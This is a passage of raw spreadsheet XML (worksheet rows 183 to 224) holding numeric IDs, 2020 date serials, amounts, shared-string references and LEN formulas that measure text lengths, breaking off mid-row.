      <c r="G183" s="1">
        <v>44034</v>
      </c>
      <c r="H183">
        <v>1000000</v>
      </c>
      <c r="I183" t="s">
        <v>11316</v>
      </c>
      <c r="J183" t="s">
        <v>11317</v>
      </c>
      <c r="K183">
        <f>LEN(I183)</f>
        <v>97</v>
      </c>
      <c r="L183">
        <f>LEN(J183)</f>
        <v>83</v>
      </c>
    </row>
    <row r="184" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A184">
        <v>20116</v>
      </c>
      <c r="B184">
        <v>2615</v>
      </c>
      <c r="C184" t="s">
        <v>5527</v>
      </c>
      <c r="D184" t="s">
        <v>10464</v>
      </c>
      <c r="E184">
        <v>18</v>
      </c>
      <c r="F184" t="s">
        <v>2236</v>
      </c>
      <c r="G184" s="1">
        <v>43944</v>
      </c>
      <c r="H184">
        <v>10000</v>
      </c>
      <c r="I184" t="s">
        <v>10481</v>
      </c>
      <c r="J184" t="s">
        <v>10482</v>
      </c>
      <c r="K184">
        <f>LEN(I184)</f>
        <v>86</v>
      </c>
      <c r="L184">
        <f>LEN(J184)</f>
        <v>83</v>
      </c>
    </row>
    <row r="185" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A185">
        <v>19967</v>
      </c>
      <c r="B185">
        <v>1337</v>
      </c>
      <c r="C185" t="s">
        <v>16291</v>
      </c>
      <c r="D185" t="s">
        <v>16292</v>
      </c>
      <c r="E185">
        <v>17</v>
      </c>
      <c r="F185" t="s">
        <v>10357</v>
      </c>
      <c r="G185" s="1">
        <v>43896</v>
      </c>
      <c r="H185" s="4">
        <v>150000</v>
      </c>
      <c r="I185" t="s">
        <v>10358</v>
      </c>
      <c r="J185" t="s">
        <v>10359</v>
      </c>
      <c r="K185">
        <f>LEN(I185)</f>
        <v>31</v>
      </c>
      <c r="L185">
        <f>LEN(J185)</f>
        <v>83</v>
      </c>
    </row>
    <row r="186" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A186">
        <v>19664</v>
      </c>
      <c r="B186">
        <v>2550</v>
      </c>
      <c r="C186" t="s">
        <v>5066</v>
      </c>
      <c r="D186" t="s">
        <v>10161</v>
      </c>
      <c r="E186">
        <v>27</v>
      </c>
      <c r="F186" t="s">
        <v>9437</v>
      </c>
      <c r="G186" s="1">
        <v>43886</v>
      </c>
      <c r="H186">
        <v>60000</v>
      </c>
      <c r="J186" t="s">
        <v>10164</v>
      </c>
      <c r="K186">
        <f>LEN(I186)</f>
        <v>0</v>
      </c>
      <c r="L186">
        <f>LEN(J186)</f>
        <v>83</v>
      </c>
    </row>
    <row r="187" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A187">
        <v>20834</v>
      </c>
      <c r="B187">
        <v>2615</v>
      </c>
      <c r="C187" t="s">
        <v>5527</v>
      </c>
      <c r="D187" t="s">
        <v>10464</v>
      </c>
      <c r="E187">
        <v>18</v>
      </c>
      <c r="F187" t="s">
        <v>11020</v>
      </c>
      <c r="G187" s="1">
        <v>44181</v>
      </c>
      <c r="H187">
        <v>1000</v>
      </c>
      <c r="I187" t="s">
        <v>10892</v>
      </c>
      <c r="J187" t="s">
        <v>11021</v>
      </c>
      <c r="K187">
        <f>LEN(I187)</f>
        <v>130</v>
      </c>
      <c r="L187">
        <f>LEN(J187)</f>
        <v>82</v>
      </c>
    </row>
    <row r="188" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A188">
        <v>19439</v>
      </c>
      <c r="B188">
        <v>853</v>
      </c>
      <c r="C188" t="s">
        <v>2564</v>
      </c>
      <c r="D188" t="s">
        <v>9875</v>
      </c>
      <c r="E188">
        <v>13</v>
      </c>
      <c r="F188" t="s">
        <v>2236</v>
      </c>
      <c r="G188" s="1">
        <v>43987</v>
      </c>
      <c r="H188">
        <v>12000</v>
      </c>
      <c r="J188" t="s">
        <v>10044</v>
      </c>
      <c r="K188">
        <f>LEN(I188)</f>
        <v>0</v>
      </c>
      <c r="L188">
        <f>LEN(J188)</f>
        <v>82</v>
      </c>
    </row>
    <row r="189" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A189">
        <v>19669</v>
      </c>
      <c r="B189">
        <v>2126</v>
      </c>
      <c r="C189" t="s">
        <v>4772</v>
      </c>
      <c r="D189" t="s">
        <v>10156</v>
      </c>
      <c r="E189">
        <v>1</v>
      </c>
      <c r="F189" t="s">
        <v>3814</v>
      </c>
      <c r="G189" s="1">
        <v>43868</v>
      </c>
      <c r="H189">
        <v>5000</v>
      </c>
      <c r="J189" t="s">
        <v>10166</v>
      </c>
      <c r="K189">
        <f>LEN(I189)</f>
        <v>0</v>
      </c>
      <c r="L189">
        <f>LEN(J189)</f>
        <v>79</v>
      </c>
    </row>
    <row r="190" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A190">
        <v>20233</v>
      </c>
      <c r="B190">
        <v>27</v>
      </c>
      <c r="C190" t="s">
        <v>598</v>
      </c>
      <c r="D190" t="s">
        <v>10565</v>
      </c>
      <c r="E190">
        <v>17</v>
      </c>
      <c r="F190" t="s">
        <v>10566</v>
      </c>
      <c r="G190" s="1">
        <v>43942</v>
      </c>
      <c r="H190">
        <v>690000</v>
      </c>
      <c r="J190" t="s">
        <v>10567</v>
      </c>
      <c r="K190">
        <f>LEN(I190)</f>
        <v>0</v>
      </c>
      <c r="L190">
        <f>LEN(J190)</f>
        <v>79</v>
      </c>
    </row>
    <row r="191" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A191">
        <v>20303</v>
      </c>
      <c r="B191">
        <v>2605</v>
      </c>
      <c r="C191" t="s">
        <v>5690</v>
      </c>
      <c r="D191" t="s">
        <v>10613</v>
      </c>
      <c r="E191">
        <v>11</v>
      </c>
      <c r="F191" t="s">
        <v>9527</v>
      </c>
      <c r="G191" s="1">
        <v>43949</v>
      </c>
      <c r="H191">
        <v>100000</v>
      </c>
      <c r="I191" t="s">
        <v>10031</v>
      </c>
      <c r="J191" t="s">
        <v>9694</v>
      </c>
      <c r="K191">
        <f>LEN(I191)</f>
        <v>100</v>
      </c>
      <c r="L191">
        <f>LEN(J191)</f>
        <v>78</v>
      </c>
    </row>
    <row r="192" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A192">
        <v>20304</v>
      </c>
      <c r="B192">
        <v>2605</v>
      </c>
      <c r="C192" t="s">
        <v>5690</v>
      </c>
      <c r="D192" t="s">
        <v>10613</v>
      </c>
      <c r="E192">
        <v>11</v>
      </c>
      <c r="F192" t="s">
        <v>10614</v>
      </c>
      <c r="G192" s="1">
        <v>43949</v>
      </c>
      <c r="H192">
        <v>100000</v>
      </c>
      <c r="I192" t="s">
        <v>10031</v>
      </c>
      <c r="J192" t="s">
        <v>9694</v>
      </c>
      <c r="K192">
        <f>LEN(I192)</f>
        <v>100</v>
      </c>
      <c r="L192">
        <f>LEN(J192)</f>
        <v>78</v>
      </c>
    </row>
    <row r="193" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A193">
        <v>17162</v>
      </c>
      <c r="B193">
        <v>2255</v>
      </c>
      <c r="C193" t="s">
        <v>4868</v>
      </c>
      <c r="D193" t="s">
        <v>9685</v>
      </c>
      <c r="E193">
        <v>16</v>
      </c>
      <c r="F193" t="s">
        <v>9437</v>
      </c>
      <c r="G193" s="1">
        <v>44034</v>
      </c>
      <c r="H193">
        <v>100000</v>
      </c>
      <c r="I193" t="s">
        <v>9702</v>
      </c>
      <c r="J193" t="s">
        <v>9694</v>
      </c>
      <c r="K193">
        <f>LEN(I193)</f>
        <v>81</v>
      </c>
      <c r="L193">
        <f>LEN(J193)</f>
        <v>78</v>
      </c>
    </row>
    <row r="194" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A194">
        <v>17158</v>
      </c>
      <c r="B194">
        <v>2255</v>
      </c>
      <c r="C194" t="s">
        <v>4868</v>
      </c>
      <c r="D194" t="s">
        <v>9685</v>
      </c>
      <c r="E194">
        <v>16</v>
      </c>
      <c r="F194" t="s">
        <v>9435</v>
      </c>
      <c r="G194" s="1">
        <v>44032</v>
      </c>
      <c r="H194">
        <v>100000</v>
      </c>
      <c r="I194" t="s">
        <v>9693</v>
      </c>
      <c r="J194" t="s">
        <v>9694</v>
      </c>
      <c r="K194">
        <f>LEN(I194)</f>
        <v>33</v>
      </c>
      <c r="L194">
        <f>LEN(J194)</f>
        <v>78</v>
      </c>
    </row>
    <row r="195" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A195">
        <v>21132</v>
      </c>
      <c r="B195">
        <v>925</v>
      </c>
      <c r="C195" t="s">
        <v>3133</v>
      </c>
      <c r="D195" t="s">
        <v>11162</v>
      </c>
      <c r="E195">
        <v>13</v>
      </c>
      <c r="F195" t="s">
        <v>9892</v>
      </c>
      <c r="G195" s="1">
        <v>44057</v>
      </c>
      <c r="H195">
        <v>20000</v>
      </c>
      <c r="J195" t="s">
        <v>11163</v>
      </c>
      <c r="K195">
        <f>LEN(I195)</f>
        <v>0</v>
      </c>
      <c r="L195">
        <f>LEN(J195)</f>
        <v>78</v>
      </c>
    </row>
    <row r="196" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A196">
        <v>17160</v>
      </c>
      <c r="B196">
        <v>2255</v>
      </c>
      <c r="C196" t="s">
        <v>4868</v>
      </c>
      <c r="D196" t="s">
        <v>9685</v>
      </c>
      <c r="E196">
        <v>16</v>
      </c>
      <c r="F196" t="s">
        <v>7241</v>
      </c>
      <c r="G196" s="1">
        <v>44034</v>
      </c>
      <c r="H196">
        <v>100000</v>
      </c>
      <c r="I196" t="s">
        <v>9698</v>
      </c>
      <c r="J196" t="s">
        <v>9699</v>
      </c>
      <c r="K196">
        <f>LEN(I196)</f>
        <v>48</v>
      </c>
      <c r="L196">
        <f>LEN(J196)</f>
        <v>77</v>
      </c>
    </row>
    <row r="197" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A197">
        <v>20000</v>
      </c>
      <c r="B197">
        <v>500</v>
      </c>
      <c r="C197" t="s">
        <v>625</v>
      </c>
      <c r="D197" t="s">
        <v>9803</v>
      </c>
      <c r="E197">
        <v>11</v>
      </c>
      <c r="F197" t="s">
        <v>10392</v>
      </c>
      <c r="G197" s="1">
        <v>43978</v>
      </c>
      <c r="H197">
        <v>10000</v>
      </c>
      <c r="J197" t="s">
        <v>10393</v>
      </c>
      <c r="K197">
        <f>LEN(I197)</f>
        <v>0</v>
      </c>
      <c r="L197">
        <f>LEN(J197)</f>
        <v>77</v>
      </c>
    </row>
    <row r="198" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A198">
        <v>20001</v>
      </c>
      <c r="B198">
        <v>500</v>
      </c>
      <c r="C198" t="s">
        <v>625</v>
      </c>
      <c r="D198" t="s">
        <v>9803</v>
      </c>
      <c r="E198">
        <v>11</v>
      </c>
      <c r="F198" t="s">
        <v>7057</v>
      </c>
      <c r="G198" s="1">
        <v>43978</v>
      </c>
      <c r="H198">
        <v>10000</v>
      </c>
      <c r="J198" t="s">
        <v>10393</v>
      </c>
      <c r="K198">
        <f>LEN(I198)</f>
        <v>0</v>
      </c>
      <c r="L198">
        <f>LEN(J198)</f>
        <v>77</v>
      </c>
    </row>
    <row r="199" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A199">
        <v>20002</v>
      </c>
      <c r="B199">
        <v>500</v>
      </c>
      <c r="C199" t="s">
        <v>625</v>
      </c>
      <c r="D199" t="s">
        <v>9803</v>
      </c>
      <c r="E199">
        <v>11</v>
      </c>
      <c r="F199" t="s">
        <v>547</v>
      </c>
      <c r="G199" s="1">
        <v>43978</v>
      </c>
      <c r="H199">
        <v>10000</v>
      </c>
      <c r="J199" t="s">
        <v>10393</v>
      </c>
      <c r="K199">
        <f>LEN(I199)</f>
        <v>0</v>
      </c>
      <c r="L199">
        <f>LEN(J199)</f>
        <v>77</v>
      </c>
    </row>
    <row r="200" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A200">
        <v>20003</v>
      </c>
      <c r="B200">
        <v>500</v>
      </c>
      <c r="C200" t="s">
        <v>625</v>
      </c>
      <c r="D200" t="s">
        <v>9803</v>
      </c>
      <c r="E200">
        <v>11</v>
      </c>
      <c r="F200" t="s">
        <v>764</v>
      </c>
      <c r="G200" s="1">
        <v>43978</v>
      </c>
      <c r="H200">
        <v>1000</v>
      </c>
      <c r="J200" t="s">
        <v>10393</v>
      </c>
      <c r="K200">
        <f>LEN(I200)</f>
        <v>0</v>
      </c>
      <c r="L200">
        <f>LEN(J200)</f>
        <v>77</v>
      </c>
    </row>
    <row r="201" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A201">
        <v>20004</v>
      </c>
      <c r="B201">
        <v>500</v>
      </c>
      <c r="C201" t="s">
        <v>625</v>
      </c>
      <c r="D201" t="s">
        <v>9803</v>
      </c>
      <c r="E201">
        <v>11</v>
      </c>
      <c r="F201" t="s">
        <v>9453</v>
      </c>
      <c r="G201" s="1">
        <v>43978</v>
      </c>
      <c r="H201">
        <v>10000</v>
      </c>
      <c r="J201" t="s">
        <v>10393</v>
      </c>
      <c r="K201">
        <f>LEN(I201)</f>
        <v>0</v>
      </c>
      <c r="L201">
        <f>LEN(J201)</f>
        <v>77</v>
      </c>
    </row>
    <row r="202" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A202">
        <v>20005</v>
      </c>
      <c r="B202">
        <v>500</v>
      </c>
      <c r="C202" t="s">
        <v>625</v>
      </c>
      <c r="D202" t="s">
        <v>9803</v>
      </c>
      <c r="E202">
        <v>11</v>
      </c>
      <c r="F202" t="s">
        <v>9466</v>
      </c>
      <c r="G202" s="1">
        <v>43978</v>
      </c>
      <c r="H202">
        <v>10000</v>
      </c>
      <c r="J202" t="s">
        <v>10393</v>
      </c>
      <c r="K202">
        <f>LEN(I202)</f>
        <v>0</v>
      </c>
      <c r="L202">
        <f>LEN(J202)</f>
        <v>77</v>
      </c>
    </row>
    <row r="203" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A203">
        <v>20006</v>
      </c>
      <c r="B203">
        <v>500</v>
      </c>
      <c r="C203" t="s">
        <v>625</v>
      </c>
      <c r="D203" t="s">
        <v>9803</v>
      </c>
      <c r="E203">
        <v>11</v>
      </c>
      <c r="F203" t="s">
        <v>9483</v>
      </c>
      <c r="G203" s="1">
        <v>43978</v>
      </c>
      <c r="H203">
        <v>10000</v>
      </c>
      <c r="J203" t="s">
        <v>10393</v>
      </c>
      <c r="K203">
        <f>LEN(I203)</f>
        <v>0</v>
      </c>
      <c r="L203">
        <f>LEN(J203)</f>
        <v>77</v>
      </c>
    </row>
    <row r="204" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A204">
        <v>20007</v>
      </c>
      <c r="B204">
        <v>500</v>
      </c>
      <c r="C204" t="s">
        <v>625</v>
      </c>
      <c r="D204" t="s">
        <v>9803</v>
      </c>
      <c r="E204">
        <v>11</v>
      </c>
      <c r="F204" t="s">
        <v>9454</v>
      </c>
      <c r="G204" s="1">
        <v>43978</v>
      </c>
      <c r="H204">
        <v>10000</v>
      </c>
      <c r="J204" t="s">
        <v>10393</v>
      </c>
      <c r="K204">
        <f>LEN(I204)</f>
        <v>0</v>
      </c>
      <c r="L204">
        <f>LEN(J204)</f>
        <v>77</v>
      </c>
    </row>
    <row r="205" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A205">
        <v>19243</v>
      </c>
      <c r="B205">
        <v>2068</v>
      </c>
      <c r="C205" t="s">
        <v>4780</v>
      </c>
      <c r="D205" t="s">
        <v>9856</v>
      </c>
      <c r="E205">
        <v>16</v>
      </c>
      <c r="F205" t="s">
        <v>9437</v>
      </c>
      <c r="G205" s="1">
        <v>43875</v>
      </c>
      <c r="H205">
        <v>10000</v>
      </c>
      <c r="I205" t="s">
        <v>9863</v>
      </c>
      <c r="J205" t="s">
        <v>9862</v>
      </c>
      <c r="K205">
        <f>LEN(I205)</f>
        <v>180</v>
      </c>
      <c r="L205">
        <f>LEN(J205)</f>
        <v>76</v>
      </c>
    </row>
    <row r="206" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A206">
        <v>19242</v>
      </c>
      <c r="B206">
        <v>2068</v>
      </c>
      <c r="C206" t="s">
        <v>4780</v>
      </c>
      <c r="D206" t="s">
        <v>9856</v>
      </c>
      <c r="E206">
        <v>16</v>
      </c>
      <c r="F206" t="s">
        <v>9860</v>
      </c>
      <c r="G206" s="1">
        <v>43875</v>
      </c>
      <c r="H206">
        <v>500000</v>
      </c>
      <c r="I206" t="s">
        <v>9861</v>
      </c>
      <c r="J206" t="s">
        <v>9862</v>
      </c>
      <c r="K206">
        <f>LEN(I206)</f>
        <v>162</v>
      </c>
      <c r="L206">
        <f>LEN(J206)</f>
        <v>76</v>
      </c>
    </row>
    <row r="207" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A207">
        <v>20096</v>
      </c>
      <c r="B207">
        <v>2615</v>
      </c>
      <c r="C207" t="s">
        <v>5527</v>
      </c>
      <c r="D207" t="s">
        <v>10464</v>
      </c>
      <c r="E207">
        <v>18</v>
      </c>
      <c r="F207" t="s">
        <v>10304</v>
      </c>
      <c r="G207" s="1">
        <v>43944</v>
      </c>
      <c r="H207">
        <v>4000</v>
      </c>
      <c r="I207" t="s">
        <v>10465</v>
      </c>
      <c r="J207" t="s">
        <v>10466</v>
      </c>
      <c r="K207">
        <f>LEN(I207)</f>
        <v>72</v>
      </c>
      <c r="L207">
        <f>LEN(J207)</f>
        <v>75</v>
      </c>
    </row>
    <row r="208" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A208">
        <v>20637</v>
      </c>
      <c r="B208">
        <v>520</v>
      </c>
      <c r="C208" t="s">
        <v>1123</v>
      </c>
      <c r="D208" t="s">
        <v>10863</v>
      </c>
      <c r="E208">
        <v>16</v>
      </c>
      <c r="F208" t="s">
        <v>9437</v>
      </c>
      <c r="G208" s="1">
        <v>43980</v>
      </c>
      <c r="H208">
        <v>150000</v>
      </c>
      <c r="I208" t="s">
        <v>10864</v>
      </c>
      <c r="J208" t="s">
        <v>10865</v>
      </c>
      <c r="K208">
        <f>LEN(I208)</f>
        <v>72</v>
      </c>
      <c r="L208">
        <f>LEN(J208)</f>
        <v>75</v>
      </c>
    </row>
    <row r="209" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A209">
        <v>21329</v>
      </c>
      <c r="B209">
        <v>4798</v>
      </c>
      <c r="C209" t="s">
        <v>7183</v>
      </c>
      <c r="D209" t="s">
        <v>11310</v>
      </c>
      <c r="E209">
        <v>11</v>
      </c>
      <c r="F209" t="s">
        <v>11312</v>
      </c>
      <c r="G209" s="1">
        <v>44034</v>
      </c>
      <c r="H209">
        <v>100000</v>
      </c>
      <c r="I209" t="s">
        <v>11313</v>
      </c>
      <c r="J209" t="s">
        <v>10865</v>
      </c>
      <c r="K209">
        <f>LEN(I209)</f>
        <v>52</v>
      </c>
      <c r="L209">
        <f>LEN(J209)</f>
        <v>75</v>
      </c>
    </row>
    <row r="210" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A210">
        <v>19966</v>
      </c>
      <c r="B210">
        <v>1337</v>
      </c>
      <c r="C210" t="s">
        <v>16291</v>
      </c>
      <c r="D210" t="s">
        <v>16292</v>
      </c>
      <c r="E210">
        <v>17</v>
      </c>
      <c r="F210" t="s">
        <v>2236</v>
      </c>
      <c r="G210" s="1">
        <v>43896</v>
      </c>
      <c r="H210" s="4">
        <v>300000</v>
      </c>
      <c r="I210" t="s">
        <v>9899</v>
      </c>
      <c r="J210" t="s">
        <v>10356</v>
      </c>
      <c r="K210">
        <f>LEN(I210)</f>
        <v>33</v>
      </c>
      <c r="L210">
        <f>LEN(J210)</f>
        <v>75</v>
      </c>
    </row>
    <row r="211" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A211">
        <v>20234</v>
      </c>
      <c r="B211">
        <v>27</v>
      </c>
      <c r="C211" t="s">
        <v>598</v>
      </c>
      <c r="D211" t="s">
        <v>10565</v>
      </c>
      <c r="E211">
        <v>17</v>
      </c>
      <c r="F211" t="s">
        <v>4686</v>
      </c>
      <c r="G211" s="1">
        <v>43942</v>
      </c>
      <c r="H211">
        <v>230000</v>
      </c>
      <c r="J211" t="s">
        <v>10568</v>
      </c>
      <c r="K211">
        <f>LEN(I211)</f>
        <v>0</v>
      </c>
      <c r="L211">
        <f>LEN(J211)</f>
        <v>75</v>
      </c>
    </row>
    <row r="212" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A212">
        <v>21028</v>
      </c>
      <c r="B212">
        <v>667</v>
      </c>
      <c r="C212" t="s">
        <v>1296</v>
      </c>
      <c r="D212" t="s">
        <v>11104</v>
      </c>
      <c r="E212">
        <v>11</v>
      </c>
      <c r="F212" t="s">
        <v>9453</v>
      </c>
      <c r="G212" s="1">
        <v>44095</v>
      </c>
      <c r="H212">
        <v>10000</v>
      </c>
      <c r="J212" t="s">
        <v>10865</v>
      </c>
      <c r="K212">
        <f>LEN(I212)</f>
        <v>0</v>
      </c>
      <c r="L212">
        <f>LEN(J212)</f>
        <v>75</v>
      </c>
    </row>
    <row r="213" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A213">
        <v>20779</v>
      </c>
      <c r="B213">
        <v>2521</v>
      </c>
      <c r="C213" t="s">
        <v>5362</v>
      </c>
      <c r="D213" t="s">
        <v>10253</v>
      </c>
      <c r="E213">
        <v>11</v>
      </c>
      <c r="F213" t="s">
        <v>673</v>
      </c>
      <c r="G213" s="1">
        <v>43959</v>
      </c>
      <c r="H213">
        <v>3000</v>
      </c>
      <c r="I213" t="s">
        <v>10973</v>
      </c>
      <c r="J213" t="s">
        <v>10974</v>
      </c>
      <c r="K213">
        <f>LEN(I213)</f>
        <v>136</v>
      </c>
      <c r="L213">
        <f>LEN(J213)</f>
        <v>74</v>
      </c>
    </row>
    <row r="214" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A214">
        <v>20964</v>
      </c>
      <c r="B214">
        <v>2615</v>
      </c>
      <c r="C214" t="s">
        <v>5527</v>
      </c>
      <c r="D214" t="s">
        <v>10464</v>
      </c>
      <c r="E214">
        <v>18</v>
      </c>
      <c r="F214" t="s">
        <v>9217</v>
      </c>
      <c r="G214" s="1">
        <v>44032</v>
      </c>
      <c r="H214">
        <v>2000</v>
      </c>
      <c r="I214" t="s">
        <v>11079</v>
      </c>
      <c r="J214" t="s">
        <v>10492</v>
      </c>
      <c r="K214">
        <f>LEN(I214)</f>
        <v>123</v>
      </c>
      <c r="L214">
        <f>LEN(J214)</f>
        <v>74</v>
      </c>
    </row>
    <row r="215" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A215">
        <v>20126</v>
      </c>
      <c r="B215">
        <v>2615</v>
      </c>
      <c r="C215" t="s">
        <v>5527</v>
      </c>
      <c r="D215" t="s">
        <v>10464</v>
      </c>
      <c r="E215">
        <v>18</v>
      </c>
      <c r="F215" t="s">
        <v>1746</v>
      </c>
      <c r="G215" s="1">
        <v>43937</v>
      </c>
      <c r="H215">
        <v>2000</v>
      </c>
      <c r="I215" t="s">
        <v>10491</v>
      </c>
      <c r="J215" t="s">
        <v>10492</v>
      </c>
      <c r="K215">
        <f>LEN(I215)</f>
        <v>57</v>
      </c>
      <c r="L215">
        <f>LEN(J215)</f>
        <v>74</v>
      </c>
    </row>
    <row r="216" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A216">
        <v>21251</v>
      </c>
      <c r="B216">
        <v>963</v>
      </c>
      <c r="C216" t="s">
        <v>3164</v>
      </c>
      <c r="D216" t="s">
        <v>11253</v>
      </c>
      <c r="E216">
        <v>34</v>
      </c>
      <c r="F216" t="s">
        <v>7564</v>
      </c>
      <c r="G216" s="1">
        <v>44048</v>
      </c>
      <c r="H216">
        <v>482</v>
      </c>
      <c r="I216" t="s">
        <v>11254</v>
      </c>
      <c r="J216" t="s">
        <v>10492</v>
      </c>
      <c r="K216">
        <f>LEN(I216)</f>
        <v>54</v>
      </c>
      <c r="L216">
        <f>LEN(J216)</f>
        <v>74</v>
      </c>
    </row>
    <row r="217" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A217">
        <v>21252</v>
      </c>
      <c r="B217">
        <v>963</v>
      </c>
      <c r="C217" t="s">
        <v>3164</v>
      </c>
      <c r="D217" t="s">
        <v>11253</v>
      </c>
      <c r="E217">
        <v>34</v>
      </c>
      <c r="F217" t="s">
        <v>3204</v>
      </c>
      <c r="G217" s="1">
        <v>44048</v>
      </c>
      <c r="H217">
        <v>0</v>
      </c>
      <c r="I217" t="s">
        <v>11254</v>
      </c>
      <c r="J217" t="s">
        <v>10492</v>
      </c>
      <c r="K217">
        <f>LEN(I217)</f>
        <v>54</v>
      </c>
      <c r="L217">
        <f>LEN(J217)</f>
        <v>74</v>
      </c>
    </row>
    <row r="218" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A218">
        <v>19826</v>
      </c>
      <c r="B218">
        <v>2620</v>
      </c>
      <c r="C218" t="s">
        <v>16295</v>
      </c>
      <c r="D218" t="s">
        <v>16296</v>
      </c>
      <c r="E218">
        <v>2</v>
      </c>
      <c r="F218" t="s">
        <v>9437</v>
      </c>
      <c r="G218" s="1">
        <v>43942</v>
      </c>
      <c r="H218" s="4">
        <v>150000</v>
      </c>
      <c r="I218" t="s">
        <v>9693</v>
      </c>
      <c r="J218" t="s">
        <v>10269</v>
      </c>
      <c r="K218">
        <f>LEN(I218)</f>
        <v>33</v>
      </c>
      <c r="L218">
        <f>LEN(J218)</f>
        <v>74</v>
      </c>
    </row>
    <row r="219" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A219">
        <v>19827</v>
      </c>
      <c r="B219">
        <v>2620</v>
      </c>
      <c r="C219" t="s">
        <v>16295</v>
      </c>
      <c r="D219" t="s">
        <v>16296</v>
      </c>
      <c r="E219">
        <v>2</v>
      </c>
      <c r="F219" t="s">
        <v>10270</v>
      </c>
      <c r="G219" s="1">
        <v>43942</v>
      </c>
      <c r="H219" s="4">
        <v>150000</v>
      </c>
      <c r="I219" t="s">
        <v>9693</v>
      </c>
      <c r="J219" t="s">
        <v>10269</v>
      </c>
      <c r="K219">
        <f>LEN(I219)</f>
        <v>33</v>
      </c>
      <c r="L219">
        <f>LEN(J219)</f>
        <v>74</v>
      </c>
    </row>
    <row r="220" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A220">
        <v>19829</v>
      </c>
      <c r="B220">
        <v>2620</v>
      </c>
      <c r="C220" t="s">
        <v>16295</v>
      </c>
      <c r="D220" t="s">
        <v>16296</v>
      </c>
      <c r="E220">
        <v>2</v>
      </c>
      <c r="F220" t="s">
        <v>1030</v>
      </c>
      <c r="G220" s="1">
        <v>43942</v>
      </c>
      <c r="H220" s="4">
        <v>100000</v>
      </c>
      <c r="I220" t="s">
        <v>9693</v>
      </c>
      <c r="J220" t="s">
        <v>10269</v>
      </c>
      <c r="K220">
        <f>LEN(I220)</f>
        <v>33</v>
      </c>
      <c r="L220">
        <f>LEN(J220)</f>
        <v>74</v>
      </c>
    </row>
    <row r="221" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A221">
        <v>19979</v>
      </c>
      <c r="B221">
        <v>2620</v>
      </c>
      <c r="C221" t="s">
        <v>5410</v>
      </c>
      <c r="D221" t="s">
        <v>10268</v>
      </c>
      <c r="E221">
        <v>2</v>
      </c>
      <c r="F221" t="s">
        <v>1746</v>
      </c>
      <c r="G221" s="1">
        <v>43942</v>
      </c>
      <c r="H221">
        <v>150000</v>
      </c>
      <c r="I221" t="s">
        <v>9693</v>
      </c>
      <c r="J221" t="s">
        <v>10269</v>
      </c>
      <c r="K221">
        <f>LEN(I221)</f>
        <v>33</v>
      </c>
      <c r="L221">
        <f>LEN(J221)</f>
        <v>74</v>
      </c>
    </row>
    <row r="222" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A222">
        <v>19980</v>
      </c>
      <c r="B222">
        <v>2620</v>
      </c>
      <c r="C222" t="s">
        <v>5410</v>
      </c>
      <c r="D222" t="s">
        <v>10268</v>
      </c>
      <c r="E222">
        <v>2</v>
      </c>
      <c r="F222" t="s">
        <v>9435</v>
      </c>
      <c r="G222" s="1">
        <v>43942</v>
      </c>
      <c r="H222">
        <v>100000</v>
      </c>
      <c r="I222" t="s">
        <v>9693</v>
      </c>
      <c r="J222" t="s">
        <v>10269</v>
      </c>
      <c r="K222">
        <f>LEN(I222)</f>
        <v>33</v>
      </c>
      <c r="L222">
        <f>LEN(J222)</f>
        <v>74</v>
      </c>
    </row>
    <row r="223" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A223">
        <v>20810</v>
      </c>
      <c r="B223">
        <v>2368</v>
      </c>
      <c r="C223" t="s">
        <v>6056</v>
      </c>
      <c r="D223" t="s">
        <v>10993</v>
      </c>
      <c r="E223">
        <v>12</v>
      </c>
      <c r="F223" t="s">
        <v>10997</v>
      </c>
      <c r="G223" s="1">
        <v>44018</v>
      </c>
      <c r="H223">
        <v>100</v>
      </c>
      <c r="I223" t="s">
        <v>9693</v>
      </c>
      <c r="J223" t="s">
        <v>10998</v>
      </c>
      <c r="K223">
        <f>LEN(I223)</f>
        <v>33</v>
      </c>
      <c r="L223">
        <f>LEN(J223)</f>
        <v>74</v>
      </c>
    </row>
    <row r="224" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A224">
        <v>19828</v>
      </c>
      <c r="B224">
        <v>2620</v>
      </c>
      <c r="C224" t="s">
        <v>16295</v>
      </c>
      <c r="D224" t="s">
        <v>16296</v>
      </c>
      <c r="E224">
        <v>2</v>
      </c>
      <c r="F224" t="s">
        <v>10271</v>
      </c>
      <c r="G224" s="1">
        <v>43942</v>
      </c>
      <c r="H224" s="4">
        <v>100000</v>
      </c>
      <c r="I224" t="s">
        <v>9550</v>
      </c>
      <c r="J224" t="s">
